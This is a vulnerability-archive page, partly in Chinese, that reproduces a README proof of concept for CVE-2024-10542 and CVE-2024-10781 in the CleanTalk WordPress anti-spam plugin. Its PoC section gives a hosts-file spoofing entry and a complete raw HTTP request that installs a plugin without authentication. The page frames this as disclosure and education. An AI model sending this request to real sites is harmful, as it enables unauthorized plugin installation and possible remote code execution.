POC详情: cad792a1ad767abb7d5929208b7db28213c44ee3

来源
关联漏洞
标题: WordPress plugin Spam protection, Anti-Spam, FireWall by CleanTalk 安全漏洞 (CVE-2024-10542)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Spam protection, Anti-Spam, FireWall by CleanTalk 6.43.2版本及之前版本存在安全漏洞。攻击者利用该漏洞可以远程执行代码。
描述
WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 is vulnerable to Unauthenticated Arbitrary Plugin Installation
介绍
## Poc Of CVE-2024-10542 and CVE-2024-10781 Broken Authentication in Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2

### Disclaimer:
The information provided in this document regarding for CVE-2024-10542 is for learning and educational purposes only. We do not encourage or authorize the use of this information for any detrimental purposes, including but not limited to exploitation, system tampering, or other illegal activities.

### Introduction:
In an increasingly complex digital landscape, ensuring the security of websites is paramount for many site owners. Recently, two critical vulnerabilities have been discovered that pose a significant threat to WordPress sites. These vulnerabilities affect the well-known CleanTalk plugin, which provides spam protection, anti-spam measures, and a firewall. What makes this situation even more urgent? Let’s delve deeper!
Two vulnerabilities tracked as CVE-2024-10542 and CVE-2024-10781 could allow unauthenticated attackers to install and activate malicious plugins on susceptible sites. This not only jeopardizes the site's reputation but also opens the door for attackers to execute remote code. With a CVSS score of 9.8 out of 10, it’s evident that these vulnerabilities fall into the highly dangerous category. According to Wordfence, both vulnerabilities concern an authorization bypass issue that could allow a malicious actor to install and activate arbitrary plugins. This could then pave the way for remote code execution if the activated plugin is vulnerable of its own.

### PoC:
first of all malicious users will set their hosts file on their operating systems:
```
127.0.0.1 cleantalk.org
```
after which they sent a request like this
```txt
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct
```

### Conclusion:
Cybersecurity is a responsibility shared by every site owner. By keeping plugins up to date and remaining vigilant about potential vulnerabilities, we can protect our sites from malicious attacks. Make sure you have updated CleanTalk to the latest version and conduct routine checks on other plugins to ensure maximum security. Remember, small steps can prevent significant disasters!

### Reference:
- [https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html](https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html)
- [https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability](https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability)
- [https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation)
- [https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631](https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631)

### Buy me a coffe:
- [https://saweria.co/ubaii](https://saweria.co/ubaii)
- [https://buymeacoffee.com/ubaii](https://buymeacoffee.com/ubaii)
- [https://trakteer.id/ubaii](https://trakteer.id/ubaii)

### Thanks To:
Allah, Muhammad SAW, mikemyers, Markdown Monster, my family, you?
文件快照

[4.0K] /data/pocs/cad792a1ad767abb7d5929208b7db28213c44ee3 └── [4.2K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。